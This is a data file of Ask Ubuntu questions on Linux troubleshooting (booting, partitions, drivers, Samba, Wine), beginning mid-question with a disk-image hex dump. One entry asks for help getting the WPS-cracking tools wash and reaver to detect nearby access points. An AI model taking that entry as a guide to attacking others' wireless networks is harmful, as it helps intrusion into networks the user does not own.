00d8 1a00 b806 0000 0000 0000 0200 0000 ... ... ... ... ... . 0000030 : 0100 0600 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000040 : 0000 29f5 5ccb 6120 2020 2020 2020 2020 .. ) .\.a 0000050 : 2020 4641 5433 3220 2020 0e1f be77 7cac fat32 ... w| . 0000060 : 22c0 740b 56b4 0ebb 0700 cd10 5eeb f032 `` .t.v ... ... .^..2 0000070 : e4cd 16cd 19eb fe54 6869 7320 6973 206e ... ... .this is n 0000080 : 6f74 2061 2062 6f6f 7461 626c 6520 6469 ot a bootable di 0000090 : 736b 2e20 2050 6c65 6173 6520 696e 7365 sk . please inse 00000a0 : 7274 2061 2062 6f6f 7461 626c 6520 666c rt a bootable fl 00000b0 : 6f70 7079 2061 6e64 0d0a 7072 6573 7320 oppy and..press 00000c0 : 616e 7920 6b65 7920 746f 2074 7279 2061 any key to try a 00000d0 : 6761 696e 202e 2e2e 200d 0a00 0000 0000 gain ... ... ... . 00000e0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000f0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000100 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000110 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000120 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000130 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000140 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000150 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000160 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000170 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000180 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000190 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001a0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001b0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001c0 : 340d 0b61 277a 0008 0000 00d0 1a00 0000 4..a'z ... ... ... . 00001d0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001e0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001f0 : 0000 0000 0000 0000 0000 0000 0000 55aa ... ... ... ... ..u . as expected . but , when i look for the same data using the following command , i get very different results : dd if=sdb.img bs=1 count=512 skip=206848 |xxd 512+0 records in 512+0 records out 512 bytes ( 512 b ) copied , 0.00159998 s , 320 kb/s 0000000 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000010 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000020 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000030 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000040 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000050 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000060 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000070 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000080 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000090 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000a0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000b0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000c0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000d0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000e0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00000f0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000100 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000110 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000120 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000130 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000140 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000150 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000160 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000170 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000180 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000190 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001a0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001b0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001c0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001d0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001e0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 00001f0 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . this does n't make any sense . both times i 'm pulling 512b using a bs of 1 works fine when i used it before . again : # dd if=sdb.img bs=1 count=66 skip=446 | xxd -cols 16 which provides the following information : 0000000 : 0020 2100 06df 130c 0008 0000 0020 0300 . ! ... ... ... . .. 0000010 : 00df 140c 0561 277a 0028 0300 00d8 1a00 ... ..a'z. ( ... ... 0000020 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000030 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000040 : 55aa
389001	system wo n't boot into recovery mode	i 'm new to the whole linux thing . i bought the computer ( hp envy m6 ) from a pawn shop under the impression it had windows 8 installed , with a duel boot version of linux . not the case at all . it is running kubuntu kde desktop . ca n't figure out where the version is . and only kubuntu . here 's the kicker . every time i try to do a recovery mode boot , absolutely nothing happens . besides the system freezing up . so , sorry for going off on a little tangent there . the reason i need to boot into recovery mode , is so i can reset the admin password , then uninstall kubuntu . how can i resolve ?
389003	linux-headers uname mismatch	the headers i have in my /usr/src are linux-headers-3.2.0-57-generic and linux-headers-3.2.0-57-generic-pae , but uname -r returns 3.0.0-12-generic-pae cat /proc/version agrees with uname . i downloaded the linux source . i did not get any header files with it . 'find / ' does not find 'linux-headers-3.0.0-12-generic-pae ' on the system . when i try to build my video drivers it complains about the mismatch . what should i be using ? i got to this state by upgrading from 11.10 . maybe the upgrade failed . when i log in , i get the message welcome ... to 12.04.3 ( gnu/linux 3.0.0-12-generic-pae ) followed by new release 12.10 available yet do-release-upgrade returns no new release found .
389004	how to add ohci_pci to initram	hello i just downloaded the ubuntu 13.10 and installed it on my computer . rebooted and it wanted to me to unlock a disk with the passphrase i put . i noticed my keyboard was n't working and i went to google on my laptop . eventually i came to 1 post of my hour search that said anything to help me . `` from a live cd you should be able to open your encrypted root , then set up a chroot there and update the initramfs on the boot partition '' now i booted up the live cd and i went into `` try ubuntu '' so i could try and get a console window open and figure this out . now i have no idea how to add this i do n't even know what it is a module ? to whatever this file is . im about pre-school level into this and have no idea what anything is saying . i figured i already deleted my entire computer on win 7 so i might as well keep on going . could anyone help me out im just trying to get my keyboard to work so i get finally just get into the desktop without using the `` try ubuntu '' with the cd
389006	how do i boot to console with refind ?	i am using refind to boot into ubuntu 13.04 on a macbook pro ( 8,2 ) . however , i seem to have messed up my install to the point where ubuntu no longer boots ( i get a flashing underscore but no text entry abilities after a brief flash of the ubuntu graphic splash screen ) . anyway , i 'd like to boot into the console or recovery mode or something in order to diagnose/fix the issue . but with refind , the only options i am given do not seem to work . low graphics mode almost works , except i do n't have a mouse and no keyboard controls seem to work , so i ca n't click through options . the other options never actually drop me at a prompt . ( i tagged the question with refit , but i am actually using refind ) .
389012	photoshop looks terrible in 13.10	i have been using photoshop cs2 for years on various versions of linux and ubuntu . in recent years , i 've found that installing it with playonlinux has had the most consistently reliable results . however , on a fresh install of 13.10 , the photoshop interface looks terrible . the fonts are clunky , and in the image below , it 's not an image of a white box on a black backround with a square drawn in a black line . it 's actually just a plain white image . the surrounding black area is where ordinarily photoshop is supposed to be a neutral gray canvas , and the black square is a selection area , which is supposed to be a dotted line . how do i get photoshop 's proper interface , as i 've had with every version of linux and ubuntu previous to this ? here is a screen grab :
389015	how to combine partitions	i have one partition that is full and about 17gb of unallocated space which i would like to combine . when i try to unmount the partition i get an error that says could not unmount . is there any way of doing this ?
389017	how can i install the alias command ?	my ubuntu installation does not have the alias command . usually it would be in /usr/bin along with other basic commands like which . i can type : which which /usr/bin/which but which alias interesting that it does n't say alias not found ; other linuxes would say that . i ran sudo find / -name `` alias '' -print and this did not find it either . could a kind person please tell me how to install alias ? i tried sudo apt-get install alias but this did not work .
389018	brightness hotkeys stop working after closing lid	apparently this is a common problem , but i have n't yet found a working solution . i know that the driver and my keyboard is supported , because after a reboot it works like a charm , but when i close the lid of my laptop and reopen it , the buttons stop working . please advise . i 'm using a fujitsu t902
389021	explain : eval `dircolors /path/to/dircolorsdb`	would someone be able to explain to me what this line does . i understand that eval creates a command by concatenating arguments . i also understand that the the text will execute because they are inside of backticks . i am trying to get the solarized colors in my ubuntu 13.10 gnome-terminal . i know how to do it but i really want to understand what is going on . i am getting the colors from this git repository
389022	installed ubuntu but not showing up	i installed ubuntu 12.04 installed in my hp laptop with pre-installed windows 8 . i created partition with three drive , c , e and f. i started and entered boot setup and selected from flash drive ubuntu . select the third option , `` something else '' . i selected the third dive ( f ) . i freed up space from this disk . then created three partition for root , swap area and home . i also created a partition from the again freed up space of 700 mb and gave it for `` device for boot loader installation '' . then clicked `` install now '' . after everything is about to be finished , got a fatal error saying `` device for boot loader can not be used '' . so , i gave another drive namely , /dev/sda/ata ... . then got a message saying installation is completed and asked me to restart the computer . when i restarted it , did not see any options given for starting ubuntu at the start up . but , when i log in to windows i can able to see two partitions created namely , g and h with the same size as of root and home . if i click on that partition , windows ask me `` whether i want to format the disk '' ? i want to know whether ubuntu is installed or not ? i am 80 % sure it is not ? if it is not installed can i run the installer again . will the previous formatted disk can be used up . or will it be possible for me to merge partitions ( g and h ) back to f before running the installation again ? i am trying with 12.04 , should i need to try with higher versions ? will these partition and merging within a drive ( f ) which is 99 % empty , will create any problems ? will that part of memory will become unusable ? or shall i use first option while `` installing ubuntu '' ? sorry for the rumblings , really i do n't have clue how to deal with this ?
389024	ssl-error while installing apache2	i had following error message while installing apache2 localhost service apache2 reload /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) syntax error on line 52 of /etc/apache2/sites-enabled/default-ssl : sslcertificatekeyfile : file '/etc/ssl/private/ssl-cert-snakeoil.key ' does not exist or is empty action 'configtest ' failed . the apache error log may have more information . ... fail ! how to resolve this ?
389026	what trusted file cleaning tools are available for ubuntu ?	i want to get a trusted file cleaning tool to remove unwanted files . when i try to add the ubuntu tweak repository it says it is from an untrusted repository . so , are there any trusted file cleaning tools available for ubuntu ?
389028	is it impossible to use hibernate on my laptop ( hp compaq 6510b ) ?	my laptop is running xubuntu 13.10 when tried the sudo pm-hibernate command , my laptop 's screen became black for less than half a second and then it was on again . my wifi was disconnected and videos continues to play at the moment when i entered the command .
389035	updating kernel version from 3.2 to 3.8.0 wired connection not working in 12.04 ( lts )	after updating kernel version from 3.2 to 3.8.0 wired connection not working in 12.04 ( lts ) $ uname -r 3.8.0-030800-generic $ ifconfig -a eth1 link encap : ethernet hwaddr 9c:2a:70 : cd : f2 : c5 inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :9e2a:70ff : fecd : f2c5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3219 errors:0 dropped:0 overruns:0 frame:24547 tx packets:3081 errors:11 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2677978 ( 2.6 mb ) tx bytes:517085 ( 517.0 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:456 errors:0 dropped:0 overruns:0 frame:0 tx packets:456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:51116 ( 51.1 kb ) tx bytes:51116 ( 51.1 kb ) $ lshw -c network : warning : you should run this program as super-user . *-network description : wireless interface product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth1 version : 01 serial : 9c:2a:70 : cd : f2 : c5 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.1.4 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : f7c00000-f7c07fff *-network unclaimed description : ethernet controller product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 version : 07 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff warning : output may be incomplete or inaccurate , you should run this program as super-user . $ sudo vi /etc/networkmanager/networkmanager.conf : change the line managed=false to managed=true save , stop and start network manager : sudo service network-manager restart but wired connection not showing . how to connect wired network ? how to resolve this ?
389037	how can i upgrade my ubuntu 10.10 to 12.04 ?	i currently have an acer aspire dualbooting with windows 7 and ubuntu 10.10 . i would like to have the advantage of long term support that 12.04 provides and would like to upgrade the ubuntu 10.10 . my computer 's memory is partitioned so that it is roughly 90gb for windows , 90 for ubuntu , and the rest ( roughly 120gb ) i use as a sort of `` shared space '' so i can save and access files from both os . i just want to know how to do the upgrade without ruining this set-up .
389039	problem with winbind/samba	i 've been having an issue on my network that has completely vexed me . i have three workstations running ubuntu 13.04 , one windows 7 workstation , and three servers on ubuntu server 12.04 . one of the servers is a domain controller running samba4 and handles dns , kerberos , ntp , and dhcp . today i was trying to add a laptop to the domain , running ubuntu 13.10 . i issue net ads join -u adminuser and the laptop joins the domain with no errors . i literally copied and pasted the config files from the other workstations and verified the permissions . when i run wbinfo i can see the domain users and groups . however , when i run getent i see only local users and groups . if i run wbinfo -a domainuser -- verbose , i am asked for the user 's password and the password is accepted with no errors . kerberos works as well . nsswitch.conf , pam.d/common-auth , pam.d/common-session , pam.d/common-account , smb.conf , and krb5.conf are all exact copies of the other systems ( which work ) , and i 've even read through them all to verify this . is there something i 've overlooked ? is there something that was changed on ubuntu between 13.04 and 13.10 ? any help would be appreciated !
389041	going from ubuntu to windows	i 'm trying to install windows on a computer that before had ubuntu 13.10 . i tried to install windows with a usb . i ended up having to delete my partitions because ( ubunutu partition were in the wrong format ) . i have a main hard drive 475 gb and another one which is 15 gb . nonetheless , i installed windows on my main hard drive and when it got to the part where the computer was supposed to restart . . . ( it restarted but ) the computer booted to grub rescue . saying error : no such device : bb859256-9548-4923-bc43s-599bead4c6f . entering rescue mode ... i reinstall windows but it resulted the same . i saw people who have ubuntu and windows dual boot sometimes have the same problem any help will be greatly appreciated want to install windows on dev/sda2 want to install ubuntu on dev/sda1
389049	dual booting osx mavericks and ubuntu 13.10	has anyone had any luck with starting a fresh dual boot scenario starting with mavericks installed ? ive recently upgraded my hardware to a 2009 macbook with a shiny new 240 gb ssd . i installed mavericks via usb , however , the tutorials for dual booting osx and ubuntu seem to fail at the partitioning stage with mavericks as a starting os . ive looked into cloning my old 250 gb hdd which is already booting osx/ubuntu with refit installed but the process is currently out of my technical abilities . anyone have any advice ?
389050	how can i regain my ssd icon in the launcher ?	i 'm new to ubuntu and linux and as a matter of fact i just loaded ubuntu onto my system ! i own an asus g75vw-ds72 and i upgraded my c drive to a samsung evo 1tb that has windows on it and i 've loaded the ubuntu files on my samsung pro 512gb on the d drive . when i was trying out ubuntu i had the two disk drive icons on the launchpad . now that i 've loaded ubuntu on the d drive i 've lost the d drive icon . my file system icon still appears to have my ubuntu files on it . is it even a problem if i do not have this icon ? how can i get this icon back ? i 'm sorry is this is a true newbie question , i am not familiar with linux and this is a learning experience . i ran sudo fdisk -l and it indicates the following : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5209c5df device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 512.1 gb , 512110190592 bytes 255 heads , 63 sectors/track , 62260 cylinders , total 1000215216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1000215215 500107607+ ee gpt thanks ! joe
389052	integrate imagemagick & magickwand with php ubuntu 12.04	i have installed both imagemagick and magickwand in my ubuntu system by refering to the detailed instructions provided in install imagemagick from source and magickwand for php . when i chack whether imagemagick is installed or not by command identify -version , it shows me follwing message version : imagemagick 6.8.7-9 q16 i686 2013-12-09 http : //www.imagemagick.org copyright : copyright ( c ) 1999-2014 imagemagick studio llc features : dpc openmp delegates : bzlib djvu fontconfig freetype jng jp2 jpeg lcms lqr openexr pangocairo png tiff x xml zlib that means image magick is installed . and when i check the version of magickwand with magickwand-config -- version it also shows me the version number 6.8.7 q16 . but problem is when i try to intialize the wrapper class of the magickwand i.e . $ magick_wand=newmagickwand ( ) ; it shows me the fatal error as follows , fatal error : call to undefined function newmagickwand ( ) can somebody tell me where did i make a mistake and how to make it work with php .
389054	my laptop wo n't turn of properly	i have dell inspiron n5110 laptop . now it did n't turn of completely either from ubuntu 12.04 or windows 7. stuck in the loading screen in ubuntu but in windows after screen turns off the hardware did n't turn of properly . i must use power button to turn it of completely . whats the problem ? is it hardware problem . i was update the bios but it did n't work . thanks a lot .
389059	how can i install origin software	i need to install `` origin '' software for graph plottings , analysis , etc . it is basically windows supported . but i have installed wine , thereby installed few windows supported softwares and using it . but origin is not able to install properly . reason is i need to save one licence file in `` c drive '' , this is not going to happen . can anyone help me ? ? ? how can i save licence file in c drive / installation ? ? ?
389062	desktop not coming after installing 13.10	i installed ubuntu 13.10 in my laptop.first it showed `` system running in low graphics '' .i installed nvidia and ati graphics . it worked.when i rebooted my device , it asked for my password , i logged in successfully but the desktop did not come , there was only a black screen . what should i do .
389063	hard disk space lost when i installed ubuntu	my system has a 320gb hard disk and has windows 7 installed . then i installed ubuntu 12.10 ( now upgraded to 13.10 ) which uses 15gb . now only 246gb ( c : \ drive 186gb , f : \ drive 30gb , e : \ drive 30 ) is seen . i lost almost 70gb of space . where did it go ? this was the output for the command sudo fdisk -l ; mount $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x31a7d29a device boot start end blocks id system /dev/sda1 2048 28338175 14168064 27 hidden ntfs winre /dev/sda2 * 28338176 28542975 102400 7 hpfs/ntfs/exfat /dev/sda3 28542976 420340399 195898712 7 hpfs/ntfs/exfat /dev/sda4 420343806 625141759 102398977 f w95 ext 'd ( lba ) /dev/sda5 420343808 485272805 32464499 7 hpfs/ntfs/exfat /dev/sda6 549472256 611057663 30792704 7 hpfs/ntfs/exfat /dev/sda7 617056256 625141759 4042752 82 linux swap / solaris /dev/sda8 611059712 613296127 1118208 83 linux /dev/sda9 613298176 617039871 1870848 83 linux /dev/sda10 485273600 549470207 32098304 83 linux partition table entries are not in disk order $ mount /dev/sda10 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=sajeena )
389065	avi file not playing	tried to play an avi file . i have installed all gstreamer plugins as well as ubuntu-restricted-extras . this did not work and kept showing an error application/x-rar not available . then after searching for more solutions online , i enabled the following command : sudo /usr/share/doc/libdvdread4/install-css.sh this started throwing up the following error message : invalid commandline the parameters passed to the application had an invalid format . please file a bug ! the parameters were : -- transient-for=71303179 gstreamer|1.0|totem|application/x-rar decoder|decoder-application/x-rar please suggest how to fix this
389068	way to catch shutdown event in unity , ubuntu 13.04	i 'm developing gui application ( c++/qt ) and now search for correct ( documented ) termination way for application . is there any documentation how unity de notifies gui applications to exit ( some analog of wm_queryendsession signal on windows ) ?
389069	files with [ square brackets ] in the name have been deleted from ~ via apt-get	the day before yesterday i uninstalled virtualbox 4.1.18 from the repo and installed virtualbox-4.2 from the virtualbox website as well as vagrant from the vagrant site . i installed the two new .debs with dpkg -i. i had 6 vms and 3 of them had [ brackets ] in the name . i know i 'm an idiot for using them in the naming convention now . the three boxes deleted were old and have been moved between three computers . ( and were important , but that 's besides the point right now . ) here is a screenshot of the vbox gui - and of the virtualboxes dir now - i spent all of the day yesterday booting from a live cd trying to recover and deleted files with *.vbox *.vdi and *.vmdk extensions with foremost , scalpel , testdisk and extundelete . no luck . i am aware that neither vagrant not virtualbox are suppose to touch anything in the home dir when installing/removing even with -- purge . however i became aware of my coincidence of all the file names containing [ brackets ] of a user on # vagrant irc and did a search for an issue and saw this in the apt-get man pages - -s , -- simulate , -- just-print , -- dry-run , -- recon , -- no-act no action . perform a simulation of events that would occur but do not actually change the system . configuration item : apt : :get : :simulate . simulate prints out a series of lines , each one representing an rpm operation : configure ( conf ) , remove ( remv ) , unpack ( inst ) . square brackets indicate broken packages with an empty set of square brackets meaning breaks that are of no consequence ( rare ) . so ... any ideas ? did apt-get remove my ( very large ) files when uninstalling virtualbox-4.1.18 ?
389071	disable asus ul80vt discrete graphics	i am running ubuntu 13.04 on an asus ul80vt . i have upgraded the kernel to 3.12 . i want to disable the nvidia discrete gpu to save power . i have used bumblebee in the past but it did not work in this scenario . the optirun command did nothing and yes i used the correct syntax . example 'optirun firefox ' ( without the quotes ) . when i remove bumblebee it broke cinnamon and unity . can anyone either give me a way to disable the discrete graphics or successfully run bumblebee ( or anyhting like bumblebee ) ?
389072	how do i change keyboard shortcuts in nautilus 3.4	i am using nautilus 3.4 and xubuntu 12.04 . i know in nautilus 3.6 the keyboard shortcuts can be changed in ~/.config/nautilus/accels , however in 3.4 that file does not exist . is there another file in version 3.4 that i can use to edit the keyboard shortcuts ?
389074	google chrome segfaults with newer kernels on ubuntu 12.04.3 lts on amazon ec2	i have ubuntu 12.04.3 32bit running on amazon ec2 , upgrading kernel from 3.2* to 3.8 . * ( or any kernel other than 3.2 ) makes chrome segfault on startup . using newer version of google-chrome ( beta or unstable ) does n't fix the problem . chromium from default repositories works without a problem . am i missing some library or is some library of wrong version ? ldd does n't see any problem .
389075	desktop backgournd is not working	ubuntu save default backgrounds in /usr/share/backgrounds when we open appearance then system load backgrounds from that directory , right ? i have added some backgrounds in /usr/share/backgrounds directory but they are not visible in appearance window ( system settings > appearance ) . also in file manager i ca n't see the thumbnails . i checked the permission and owner of new backgrounds and they are same as old backgrounds . what i missed ? -rw-r -- r -- 1 root root 907562 jun 20 02:41 159.jpg -rw-r -- r -- 1 root root 218272 sep 25 04:06 163_by_e4v.jpg -rw-r -- r -- 1 root root 498830 jun 20 02:41 164.jpg -rw-r -- r -- 1 root root 633430 jun 20 02:41 168.jpg -rw-r -- r -- 1 root root 397147 jun 20 02:41 16.jpg -rw-r -- r -- 1 root root 480634 jun 20 02:41 173.jpg -rw-r -- r -- 1 root root 518625 jun 20 02:41 2.jpg -rw-r -- r -- 1 root root 703958 dec 10 05:27 94.jpg -rw-r -- r -- 1 root root 310177 jun 20 02:41 artcast.jpg -rw-r -- r -- 1 root root 576658 jun 20 02:41 cold evening.jpg drwxr-xr-x 2 root root 4096 oct 17 01:01 contest -rw-r -- r -- 1 root root 224578 sep 25 04:06 cyclotron_by_cyclotron_beam.jpg -rw-r -- r -- 1 root root 241288 sep 25 04:06 gota_d'água_by_eiti_kimura.jpg -rw-r -- r -- 1 root root 339206 sep 25 04:06 grass_by_jeremy_hill.jpg -rw-r -- r -- 1 root root 596305 jun 20 02:41 horseshoe bend sunset.jpg -rw-r -- r -- 1 root root 188014 sep 25 04:06 i_am_a_saucy_salamander ... _by_juan_pablo_lauriente.jpg -rw-r -- r -- 1 root root 1216788 jun 20 02:41 lake tahoe colors.jpg -rw-r -- r -- 1 root root 902549 jun 20 02:41 leaves.jpg -rw-r -- r -- 1 root root 293419 jun 20 02:41 lighthouse.jpg -rw-r -- r -- 1 root root 687995 jun 20 02:41 morning.jpg -rw-r -- r -- 1 root root 499415 sep 25 04:06 mountains_by_jamespickles.jpg -rw-r -- r -- 1 root root 267933 sep 25 04:06 mr._tau_and_the_tree_-_by_tj.jpg -rw-r -- r -- 1 root root 327245 sep 25 04:06 nylon_rainbow_by_sam_hewitt.jpg -rw-r -- r -- 1 root root 299717 sep 25 04:06 oak_by_lyle_nel.jpg -rw-r -- r -- 1 root root 831119 jun 20 02:41 our night under the stars.jpg -rw-r -- r -- 1 root root 1116445 jun 20 02:41 paris la tour eiffel.jpg -rw-r -- r -- 1 root root 130821 sep 25 04:06 salamander_by_lucas_romero_di_benedetto.jpg -rw-r -- r -- 1 root root 301417 sep 25 04:06 saucy_salamander_abstract_by_josé_vera_alcivar.jpg -rw-r -- r -- 1 root root 265433 sep 25 04:06 savannah_lilian_blot_by_a_blot_on_the_landscape.jpg -rw-r -- r -- 1 root root 215085 sep 25 04:06 taxus_baccata_by_baubusiukas.jpg -rw-r -- r -- 1 root root 1216360 jun 20 02:41 temple.jpg -rw-r -- r -- 1 root root 332887 sep 25 04:06 the_city_of_polen_by_milanvankovski.jpg -rw-r -- r -- 1 root root 1497930 jun 20 02:41 the coast.jpg -rw-r -- r -- 1 root root 161224 sep 25 04:06 the_'out'_standing_by_ydristi.jpg -rw-r -- r -- 1 root root 540071 sep 25 04:06 thingvellir_by_pattersa.jpg -rw-r -- r -- 1 root root 768501 jun 20 02:41 tunnel.jpg -rw-r -- r -- 1 root root 206030 sep 25 04:06 untitled_by_garazi_unzueta.jpg -rw-r -- r -- 1 root root 576166 jun 20 02:41 urban dream.jpg -rw-r -- r -- 1 root root 167049 sep 25 04:06 water_lily_by_denis_dugushkin.jpg -rw-r -- r -- 1 root root 200307 jun 20 02:41 water lily.jpg
389077	why firefox 25.0.1 tack high cpu usage ?	while i update my firefox to 25.0.1 in my ubuntu 12.04 , it tack a high usage of the cpu , and i have to close it and reopen it to solve it . this problem happened as when i update my firefox . in last version , it work prefect . what is the problem with new version ? why ?
389078	the best lamp stack with a gui for web dev	i 'm a spoilt windows user and always have used a wamp stack with a gui that allows me to start or stop apache and mysql services . i find it really hard switching to the lamp command line and was wondering if any of you could share some information . i have been using the bitnami linux install and with regard to stability , its absolutely horrid ! thanks in advance for the help ! best ,
389081	wash and reaver 1.4 does not detect ap ubuntu 12.04 kernel 3.8	hi im currently having an issue with wash and reaver 1.4 on ubuntu 12.04 i updated my kernel and my wireless driver ( backports ) for past issues and now everything works fine no more errors but one thing reaver and wash does not detect any ap anymore but when i run airodump-ng i detect all the ap in my area without problems . wash v1.4 wifi protected setup scan tool copyright ( c ) 2011 , tactical network solutions , craig heffner < cheffner @ tacnetsol.com > bssid channel rssi wps version wps locked essid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- and nothing happen
389082	installing ubuntu 13.10 on lenovo g510	i just bought a new lenovo g510 laptop with free dos.specs of my laptop are 4th gen core i5 4200m processor 4gb ram 500 gb harddisk i downloaded , amd64 bit iso file from the website , made my pendrive bootable using unetbootin on windows , when i connected bootable pendrive to my new machine , firstly it showed me a window which had two options , 1 ) try ubuntu 2 ) install ubuntu.. when i clicked on install ubuntu then screen got blank and installation process didnt start.. so i am not understanding what wrong i am doing here.. please help me out regards ranjit
